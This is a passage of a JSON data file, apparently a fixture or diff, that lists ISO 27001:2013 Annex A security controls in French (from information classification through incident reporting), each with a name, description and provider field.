l\u00e9gales, de valeur, de caract\u00e8re critique et de sensibilit\u00e9 au regard d\u2019une divulgation ou modification non autoris\u00e9e.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.2.2 - Marquage des informations", - "description": "Un ensemble appropri\u00e9 de proc\u00e9dures pour le marquage de l\u2019information doit \u00eatre \u00e9labor\u00e9 et mis en \u0153uvre conform\u00e9ment au plan de classification adopt\u00e9 par l\u2019organisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.2.3 - Manipulation des actifs", - "description": "Des proc\u00e9dures de traitement de l\u2019information doivent \u00eatre \u00e9labor\u00e9es et mises en \u0153uvre conform\u00e9ment au plan de classification de l\u2019information adopt\u00e9 par l\u2019organisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.3.1 - Gestion des supports amovibles", - "description": "Des proc\u00e9dures de gestion des supports amovibles doivent \u00eatre mises en \u0153uvre conform\u00e9ment au plan de classification adopt\u00e9 par l\u2019organisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.3.2 - Mise au rebut des supports", - "description": "Les supports qui ne sont plus n\u00e9cessaires doivent \u00eatre mis au rebut de mani\u00e8re s\u00e9curis\u00e9e en suivant des proc\u00e9dures formelles.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.3.3 - Transfert physique des supports", - "description": "Les supports contenant de l\u2019information doivent \u00eatre prot\u00e9g\u00e9s contre les acc\u00e8s non autoris\u00e9s, les erreurs d\u2019utilisation et l\u2019alt\u00e9ration lors du transport.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.1.1 - Politique de contr\u00f4le d\u2019acc\u00e8s", - "description": "Une politique de contr\u00f4le d\u2019acc\u00e8s doit \u00eatre \u00e9tablie, document\u00e9e et revue sur la base des exigences m\u00e9tier et de s\u00e9curit\u00e9 de l\u2019information.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.1.2 - Acc\u00e8s aux r\u00e9seaux et aux services r\u00e9seau", - "description": "Les utilisateurs doivent avoir uniquement acc\u00e8s au r\u00e9seau et aux services r\u00e9seau pour lesquels ils ont sp\u00e9cifiquement re\u00e7u une autorisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.1 - Enregistrement et d\u00e9sinscription des utilisateurs", - "description": "Un processus formel d\u2019enregistrement et de d\u00e9sinscription des utilisateurs doit \u00eatre mis en \u0153uvre pour permettre l\u2019attribution des droits d\u2019acc\u00e8s.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.2 - Distribution des acc\u00e8s aux utilisateurs", - "description": "Un processus formel de distribution des acc\u00e8s aux utilisateurs doit \u00eatre mis en \u0153uvre pour attribuer et retirer des droits d\u2019acc\u00e8s \u00e0 tous types d\u2019utilisateurs sur l\u2019ensemble des services et des syst\u00e8mes.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.3 - Gestion des droits d\u2019acc\u00e8s \u00e0 privil\u00e8ges", - "description": "L\u2019allocation et l\u2019utilisation des droits d\u2019acc\u00e8s \u00e0 privil\u00e8ges doivent \u00eatre restreintes et contr\u00f4l\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.4 - Gestion des informations secr\u00e8tes d\u2019authentification des utilisateurs", - "description": "L\u2019attribution des informations secr\u00e8tes d\u2019authentification doit \u00eatre r\u00e9alis\u00e9e dans le cadre d\u2019un processus de gestion formel.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.5 - Revue des droits d\u2019acc\u00e8s utilisateurs", - "description": "Les propri\u00e9taires d\u2019actifs doivent v\u00e9rifier les droits d\u2019acc\u00e8s des utilisateurs \u00e0 intervalles r\u00e9guliers.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.6 - Suppression ou adaptation des droits d\u2019acc\u00e8s", - "description": "Les droits d\u2019acc\u00e8s aux informations et aux moyens de traitement des informations de l\u2019ensemble des salari\u00e9s et utilisateurs tiers doivent \u00eatre supprim\u00e9s \u00e0 la fin de leur p\u00e9riode d\u2019emploi, ou adapt\u00e9s en cas de modification du contrat ou de l\u2019accord.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.3.1 - Utilisation d\u2019informations secr\u00e8tes d\u2019authentification", - "description": "Les utilisateurs doivent suivre les pratiques de l\u2019organisation pour l\u2019utilisation des informations secr\u00e8tes d\u2019authentification.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.1 - Restriction d\u2019acc\u00e8s \u00e0 l\u2019information", - "description": "L\u2019acc\u00e8s \u00e0 l\u2019information et aux fonctions d\u2019application syst\u00e8me doit \u00eatre restreint conform\u00e9ment \u00e0 la politique de contr\u00f4le d\u2019acc\u00e8s.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.2 - S\u00e9curiser les proc\u00e9dures de connexion", - "description": "Lorsque la politique de contr\u00f4le d\u2019acc\u00e8s l\u2019exige, l\u2019acc\u00e8s aux syst\u00e8mes et aux applications doit \u00eatre contr\u00f4l\u00e9 par une proc\u00e9dure de connexion s\u00e9curis\u00e9e.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.3 - Syst\u00e8me de gestion des mots de passe", - "description": "Les syst\u00e8mes qui g\u00e8rent les mots de passe doivent \u00eatre interactifs et doivent garantir la qualit\u00e9 des mots de passe.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.4 - Utilisation de programmes utilitaires \u00e0 privil\u00e8ges", - "description": "L\u2019utilisation des programmes utilitaires permettant de contourner les mesures de s\u00e9curit\u00e9 d\u2019un syst\u00e8me ou d\u2019une application doit \u00eatre limit\u00e9e et \u00e9troitement contr\u00f4l\u00e9e.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.5 - Contr\u00f4le d\u2019acc\u00e8s au code source des programmes", - "description": "L\u2019acc\u00e8s au code source des programmes doit \u00eatre restreint.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.10.1.1 - Politique d\u2019utilisation des mesures cryptographiques", - "description": "Une politique d\u2019utilisation des mesures cryptographiques en vue de prot\u00e9ger l\u2019information doit \u00eatre \u00e9labor\u00e9e et mise en \u0153uvre.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.10.1.2 - Gestion des cl\u00e9s", - "description": "Une politique sur l\u2019utilisation, la protection et la dur\u00e9e de vie des cl\u00e9s cryptographiques doit \u00eatre \u00e9labor\u00e9e et mise en \u0153uvre tout au long de leur cycle de vie.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.1 - P\u00e9rim\u00e8tre de s\u00e9curit\u00e9 physique", - "description": "Des p\u00e9rim\u00e8tres de s\u00e9curit\u00e9 doivent \u00eatre d\u00e9finis et utilis\u00e9s pour prot\u00e9ger les zones contenant l\u2019information sensible ou critique et les moyens de traitement de l\u2019information.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.2 - Contr\u00f4le d\u2019acc\u00e8s physique", - "description": "Les zones s\u00e9curis\u00e9es doivent \u00eatre prot\u00e9g\u00e9es par des contr\u00f4les ad\u00e9quats \u00e0 l\u2019entr\u00e9e pour s\u2019assurer que seul le personnel autoris\u00e9 est admis.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.3 - S\u00e9curisation des bureaux, des salles et des \u00e9quipements", - "description": "Des mesures de s\u00e9curit\u00e9 physique aux bureaux, aux salles et aux \u00e9quipements doivent \u00eatre con\u00e7ues et appliqu\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.4 - Protection contre les menaces ext\u00e9rieures et environnementales", - "description": "Des mesures de protection physique contre les d\u00e9sastres naturels, les attaques malveillantes ou les accidents doivent \u00eatre con\u00e7ues et appliqu\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.5 - Travail dans les zones s\u00e9curis\u00e9es", - "description": "Des proc\u00e9dures pour le travail dans les zones s\u00e9curis\u00e9es doivent \u00eatre con\u00e7ues et appliqu\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.6 - Zones de livraison et de chargement", - "description": "Les points d\u2019acc\u00e8s tels que les zones de livraison et de chargement et les autres points par lesquels des personnes non autoris\u00e9es peuvent p\u00e9n\u00e9trer dans les locaux doivent \u00eatre contr\u00f4l\u00e9s et, si possible, isol\u00e9s des moyens de traitement de l\u2019information, de fa\u00e7on \u00e0 \u00e9viter les acc\u00e8s non autoris\u00e9s.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.1 - Emplacement et protection des mat\u00e9riels", - "description": "Les mat\u00e9riels doivent \u00eatre localis\u00e9s et prot\u00e9g\u00e9s de mani\u00e8re \u00e0 r\u00e9duire les risques li\u00e9s \u00e0 des menaces et des dangers environnementaux et les possibilit\u00e9s d\u2019acc\u00e8s non autoris\u00e9.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.2 - Services g\u00e9n\u00e9raux", - "description": "Les mat\u00e9riels doivent \u00eatre prot\u00e9g\u00e9s des coupures de courant et autres perturbations dues \u00e0 une d\u00e9faillance des services g\u00e9n\u00e9raux.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.3 - S\u00e9curit\u00e9 du c\u00e2blage", - "description": "Les c\u00e2bles \u00e9lectriques ou de t\u00e9l\u00e9communication transportant des donn\u00e9es ou supportant les services d\u2019information doivent \u00eatre prot\u00e9g\u00e9s contre toute interception ou tout dommage.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.4 - Maintenance des mat\u00e9riels", - "description": "Les mat\u00e9riels doivent \u00eatre entretenus correctement pour garantir leur disponibilit\u00e9 permanente et leur int\u00e9grit\u00e9.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.5 - Sortie des actifs", - "description": "Les mat\u00e9riels, les informations ou les logiciels des locaux de l\u2019organisation ne doivent pas sortir sans autorisation pr\u00e9alable.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.6 - S\u00e9curit\u00e9 des mat\u00e9riels et des actifs hors des locaux", - "description": "Des mesures de s\u00e9curit\u00e9 doivent \u00eatre appliqu\u00e9es aux mat\u00e9riels utilis\u00e9s hors des locaux de l\u2019organisation en tenant compte des diff\u00e9rents risques associ\u00e9s au travail hors site.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.7 - Mise au rebut ou recyclage s\u00e9curis\u00e9(e) des mat\u00e9riels", - "description": "Tous les composants des mat\u00e9riels contenant des supports de stockage doivent \u00eatre v\u00e9rifi\u00e9s pour s\u2019assurer que toute donn\u00e9e sensible a bien \u00e9t\u00e9 supprim\u00e9e et que tout logiciel sous licence a bien \u00e9t\u00e9 d\u00e9sinstall\u00e9 ou \u00e9cras\u00e9 de fa\u00e7on s\u00e9curis\u00e9e, avant leur mise au rebut ou leur r\u00e9utilisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.8 - Mat\u00e9riels utilisateur laiss\u00e9s sans surveillance", - "description": "Les utilisateurs doivent s\u2019assurer que les mat\u00e9riels non surveill\u00e9s sont dot\u00e9s d\u2019une protection appropri\u00e9e.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.9 - Politique du bureau propre et de l\u2019\u00e9cran verrouill\u00e9", - "description": "Une politique du bureau propre pour les documents papier et les supports de stockage amovibles, et une politique de l\u2019\u00e9cran verrouill\u00e9 pour les moyens de traitement de l\u2019information doivent \u00eatre adopt\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.1.1 - Proc\u00e9dures d\u2019exploitation document\u00e9es", - "description": "Les proc\u00e9dures d\u2019exploitation doivent \u00eatre document\u00e9es et mises \u00e0 disposition de tous les utilisateurs concern\u00e9s.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.1.2 - Gestion des changements", - "description": "Les changements apport\u00e9s \u00e0 l\u2019organisation, aux processus m\u00e9tier, aux syst\u00e8mes et moyens de traitement de l\u2019information ayant une incidence sur la s\u00e9curit\u00e9 de l\u2019information doivent \u00eatre contr\u00f4l\u00e9s.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.1.3 - Dimensionnement", - "description": "L\u2019utilisation des ressources doit \u00eatre surveill\u00e9e et ajust\u00e9e et des projections sur les dimensionnements futurs doivent \u00eatre effectu\u00e9es pour garantir les performances exig\u00e9es du syst\u00e8me.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.1.4 - S\u00e9paration des environnements de d\u00e9veloppement, de test et d\u2019exploitation", - "description": "Les environnements de d\u00e9veloppement, de test et d\u2019exploitation doivent \u00eatre s\u00e9par\u00e9s pour r\u00e9duire les risques d\u2019acc\u00e8s ou de changements non autoris\u00e9s dans l\u2019environnement en exploitation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.2.1 - Mesures contre les logiciels malveillants", - "description": "Des mesures de d\u00e9tection, de pr\u00e9vention et de r\u00e9cup\u00e9ration conjugu\u00e9es \u00e0 une sensibilisation des utilisateurs adapt\u00e9e, doivent \u00eatre mises en \u0153uvre pour se prot\u00e9ger contre les logiciels malveillants.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.3.1 - Sauvegarde des informations", - "description": "Des copies de sauvegarde de l\u2019information, des logiciels et des images syst\u00e8mes doivent \u00eatre r\u00e9alis\u00e9s et test\u00e9s r\u00e9guli\u00e8rement conform\u00e9ment \u00e0 une politique de sauvegarde convenue.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.4.1 - Journalisation des \u00e9v\u00e9nements", - "description": "Des journaux d\u2019\u00e9v\u00e9nements enregistrant les activit\u00e9s de l\u2019utilisateur, les exceptions, les d\u00e9faillances et les \u00e9v\u00e9nements li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information doivent \u00eatre cr\u00e9\u00e9s, tenus \u00e0 jour et v\u00e9rifi\u00e9s r\u00e9guli\u00e8rement.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.4.2 - Protection de l\u2019information journalis\u00e9e", - "description": "Les moyens de journalisation et d\u2019information journalis\u00e9e doivent \u00eatre prot\u00e9g\u00e9s contre les risques de falsification ou d\u2019acc\u00e8s non autoris\u00e9.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.4.3 - Journaux administrateur et op\u00e9rateur", - "description": "Les activit\u00e9s de l\u2019administrateur syst\u00e8me et de l\u2019op\u00e9rateur syst\u00e8me doivent \u00eatre journalis\u00e9es, prot\u00e9g\u00e9es et v\u00e9rifi\u00e9es r\u00e9guli\u00e8rement.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.4.4 - Synchronisation des horloges", - "description": "Les horloges de l\u2019ensemble des syst\u00e8mes de traitement de l\u2019information concern\u00e9s d\u2019une organisation ou d\u2019un domaine de s\u00e9curit\u00e9 doivent \u00eatre synchronis\u00e9es sur une source de r\u00e9f\u00e9rence temporelle unique.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.5.1 - Installation de logiciels sur des syst\u00e8mes en exploitation", - "description": "Des proc\u00e9dures doivent \u00eatre mises en \u0153uvre pour contr\u00f4ler l\u2019installation de logiciel sur des syst\u00e8mes en exploitation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.6.1 - Gestion des vuln\u00e9rabilit\u00e9s techniques", - "description": "Des informations sur les vuln\u00e9rabilit\u00e9s techniques des syst\u00e8mes d\u2019information en exploitation doivent \u00eatre obtenues en temps opportun, l\u2019exposition de l\u2019organisation \u00e0 ces vuln\u00e9rabilit\u00e9s doit \u00eatre \u00e9valu\u00e9e et les mesures appropri\u00e9es doivent \u00eatre prises pour traiter le risque associ\u00e9.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.6.2 - Restrictions li\u00e9es \u00e0 l\u2019installation de logiciels", - "description": "Des r\u00e8gles r\u00e9gissant l\u2019installation de logiciels par les utilisateurs doivent \u00eatre \u00e9tablies et mises en \u0153uvre.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.7.1 - Mesures relatives \u00e0 l\u2019audit des syst\u00e8mes d\u2019information", - "description": "Les exigences et activit\u00e9s d\u2019audit impliquant des v\u00e9rifications sur des syst\u00e8mes en exploitation doivent \u00eatre pr\u00e9vues avec soin et valid\u00e9es afin de r\u00e9duire au minimum les perturbations subies par les processus m\u00e9tier.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.1.1 - Contr\u00f4le des r\u00e9seaux", - "description": "Les r\u00e9seaux doivent \u00eatre g\u00e9r\u00e9s et contr\u00f4l\u00e9s pour prot\u00e9ger l\u2019information contenue dans les syst\u00e8mes et les applications.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.1.2 - S\u00e9curit\u00e9 des services de r\u00e9seau", - "description": "Pour tous les services de r\u00e9seau, les m\u00e9canismes de s\u00e9curit\u00e9, les niveaux de service et les exigences de gestion, doivent \u00eatre identifi\u00e9s et int\u00e9gr\u00e9s dans les accords de services de r\u00e9seau, que ces services soient fournis en interne ou externalis\u00e9s.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.1.3 - Cloisonnement des r\u00e9seaux", - "description": "Les groupes de services d\u2019information, d\u2019utilisateurs et de syst\u00e8mes d\u2019information doivent \u00eatre cloisonn\u00e9s sur les r\u00e9seaux.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.2.1 - Politiques et proc\u00e9dures de transfert de l\u2019information", - "description": "Des politiques, des proc\u00e9dures et des mesures de transfert formelles doivent \u00eatre mises en place pour prot\u00e9ger les transferts d\u2019information transitant par tous types d\u2019\u00e9quipements de communication.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.2.2 - Accords en mati\u00e8re de transfert d\u2019information", - "description": "Des accords doivent traiter du transfert s\u00e9curis\u00e9 de l\u2019information li\u00e9e \u00e0 l\u2019activit\u00e9 entre l\u2019organisation et les tiers.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.2.3 - Messagerie \u00e9lectronique", - "description": "L\u2019information transitant par la messagerie \u00e9lectronique doit \u00eatre prot\u00e9g\u00e9e de mani\u00e8re appropri\u00e9e.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.2.4 - Engagements de confidentialit\u00e9 ou de non-divulgation", - "description": "Les exigences en mati\u00e8re d\u2019engagements de confidentialit\u00e9 ou de non-divulgation, doivent \u00eatre identifi\u00e9es, v\u00e9rifi\u00e9es r\u00e9guli\u00e8rement et document\u00e9es conform\u00e9ment aux besoins de l\u2019organisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.1.1 - Analyse et sp\u00e9cification des exigences de s\u00e9curit\u00e9 de l\u2019information", - "description": "Les exigences li\u00e9es \u00e0 la s\u00e9curit\u00e9 de l\u2019information doivent \u00eatre int\u00e9gr\u00e9es aux exigences des nouveaux syst\u00e8mes d\u2019information ou des am\u00e9liorations de syst\u00e8mes d\u2019information existants.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.1.2 - S\u00e9curisation des services d\u2019application sur les r\u00e9seaux publics", - "description": "Les informations li\u00e9es aux services d\u2019application transmises sur les r\u00e9seaux publics doivent \u00eatre prot\u00e9g\u00e9es contre les activit\u00e9s frauduleuses, les diff\u00e9rents contractuels, ainsi que la divulgation et la modification non autoris\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.1.3 - Protection des transactions li\u00e9es aux services d\u2019application", - "description": "Les informations impliqu\u00e9es dans les transactions li\u00e9es aux services d\u2019application doivent \u00eatre prot\u00e9g\u00e9es pour emp\u00eacher une transmission incompl\u00e8te, des erreurs d\u2019acheminement, la modification non autoris\u00e9e, la divulgation non autoris\u00e9e, la duplication non autoris\u00e9e du message ou sa r\u00e9\u00e9mission.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.1 - Politique de d\u00e9veloppement s\u00e9curis\u00e9", - "description": "Des r\u00e8gles de d\u00e9veloppement des logiciels et des syst\u00e8mes doivent \u00eatre \u00e9tablies et appliqu\u00e9es aux d\u00e9veloppements de l\u2019organisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.2 - Proc\u00e9dures de contr\u00f4le des changements de syst\u00e8me", - "description": "Les changements des syst\u00e8mes dans le cadre du cycle de d\u00e9veloppement doivent \u00eatre contr\u00f4l\u00e9s par le biais de proc\u00e9dures formelles.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.3 - Revue technique des applications apr\u00e8s changement apport\u00e9 \u00e0 la plateforme d\u2019exploitation", - "description": "Lorsque des changements sont apport\u00e9s aux plateformes d\u2019exploitation, les applications critiques m\u00e9tier doivent \u00eatre v\u00e9rifi\u00e9es et test\u00e9es afin de v\u00e9rifier l\u2019absence de tout effet ind\u00e9sirable sur l\u2019activit\u00e9 ou sur la s\u00e9curit\u00e9.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.4 - Restrictions relatives aux changements apport\u00e9s aux progiciels", - "description": "Les modifications des progiciels ne doivent pas \u00eatre encourag\u00e9es, \u00eatre limit\u00e9es aux changements n\u00e9cessaires et tout changement doit \u00eatre strictement contr\u00f4l\u00e9.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.5 - Principes d\u2019ing\u00e9nierie de la s\u00e9curit\u00e9 des syst\u00e8mes", - "description": "Des principes d\u2019ing\u00e9nierie de la s\u00e9curit\u00e9 des syst\u00e8mes doivent \u00eatre \u00e9tablis, document\u00e9s, tenus \u00e0 jour et appliqu\u00e9s \u00e0 tous les travaux de mise en \u0153uvre des syst\u00e8mes d\u2019information.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.6 - Environnement de d\u00e9veloppement s\u00e9curis\u00e9", - "description": "Les organisations doivent \u00e9tablir des environnements de d\u00e9veloppement s\u00e9curis\u00e9s pour les t\u00e2ches de d\u00e9veloppement et d\u2019int\u00e9gration du syst\u00e8me, qui englobe l\u2019int\u00e9gralit\u00e9 du cycle de vie du d\u00e9veloppement du syst\u00e8me, et en assurer la protection de mani\u00e8re appropri\u00e9e.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.7 - D\u00e9veloppement externalis\u00e9", - "description": "L\u2019organisation doit superviser et contr\u00f4ler l\u2019activit\u00e9 de d\u00e9veloppement du syst\u00e8me externalis\u00e9e.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.8 - Test de la s\u00e9curit\u00e9 du syst\u00e8me", - "description": "Les tests de fonctionnalit\u00e9 de la s\u00e9curit\u00e9 doivent \u00eatre r\u00e9alis\u00e9s pendant le d\u00e9veloppement.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.9 - Test de conformit\u00e9 du syst\u00e8me", - "description": "Des programmes de test de conformit\u00e9 et des crit\u00e8res associ\u00e9s doivent \u00eatre d\u00e9termin\u00e9s pour les nouveaux syst\u00e8mes d\u2019information, les mises \u00e0 jour et les nouvelles versions.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.3.1 - Protection des donn\u00e9es de test", - "description": "Les donn\u00e9es de test doivent \u00eatre s\u00e9lectionn\u00e9es avec soin, prot\u00e9g\u00e9es et contr\u00f4l\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.1.1 - Politique de s\u00e9curit\u00e9 de l\u2019information dans les relations avec les fournisseurs", - "description": "Des exigences de s\u00e9curit\u00e9 de l\u2019information pour limiter les risques r\u00e9sultant de l\u2019acc\u00e8s des fournisseurs aux actifs de l\u2019organisation doivent \u00eatre accept\u00e9es par le fournisseur et document\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.1.2 - La s\u00e9curit\u00e9 dans les accords conclus avec les fournisseurs", - "description": "Les exigences applicables li\u00e9es \u00e0 la s\u00e9curit\u00e9 de l\u2019information doivent \u00eatre \u00e9tablies et convenues avec chaque fournisseur pouvant acc\u00e9der, traiter, stocker, communiquer ou fournir des composants de l\u2019infrastructure informatique destin\u00e9s \u00e0 l\u2019information de l\u2019organisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.1.3 - Cha\u00eene d\u2019approvisionnement des produits et des services informatiques", - "description": "Les accords conclus avec les fournisseurs doivent inclure des exigences sur le traitement des risques li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information associ\u00e9 \u00e0 la cha\u00eene d\u2019approvisionnement des produits et des services informatiques.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.2.1 - Surveillance et revue des services des fournisseurs", - "description": "Les organisations doivent surveiller, v\u00e9rifier et auditer \u00e0 intervalles r\u00e9guliers la prestation des services assur\u00e9s par les fournisseurs.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.2.2 - Gestion des changements apport\u00e9s dans les services des fournisseurs", - "description": "Les changements effectu\u00e9s dans les prestations de service des fournisseurs, comprenant le maintien et l\u2019am\u00e9lioration des politiques, proc\u00e9dures et mesures existant en mati\u00e8re de s\u00e9curit\u00e9 de l\u2019information, doivent \u00eatre g\u00e9r\u00e9s en tenant compte du caract\u00e8re critique de l\u2019information, des syst\u00e8mes et des processus concern\u00e9s et de la r\u00e9appr\u00e9ciation des risques.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.1 - Responsabilit\u00e9s et proc\u00e9dures", - "description": "Des responsabilit\u00e9s et des proc\u00e9dures permettant de garantir une r\u00e9ponse rapide, efficace et pertinente doivent \u00eatre \u00e9tablies en cas d\u2019incident li\u00e9 \u00e0 la s\u00e9curit\u00e9 de l\u2019information.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.2 - Signalement des \u00e9v\u00e9nements li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information", - "description": "Les \u00e9v\u00e9nements li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information doivent \u00eatre signal\u00e9s dans les meilleurs d\u00e9lais par les voies hi\u00e9rarchiques appropri\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.3 - Signalement des failles li\u00e9es \u00e0 la s\u00e9curit\u00e9 de l\u2019information", - "description": "Les salari\u00e9s et les sous-traitants utilisant les syst\u00e8mes et services d\u2019information de l\u2019organisation doivent noter et signaler toute faille de s\u00e9curit\u00e9 observ\u00e9e ou soup\u00e7onn\u00e9e dans les syst\u00e8mes ou services.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.4 - Appr\u00e9ciation des \u00e9v\u00e9nements li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information et prise de d\u00e9cision", - "description": "Les \u00e9v\u00e9nements li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information doivent \u00eatre appr\u00e9ci\u00e9s et il doit \u00eatre d\u00e9cid\u00e9 s\u2019il faut les classer comme incidents li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": 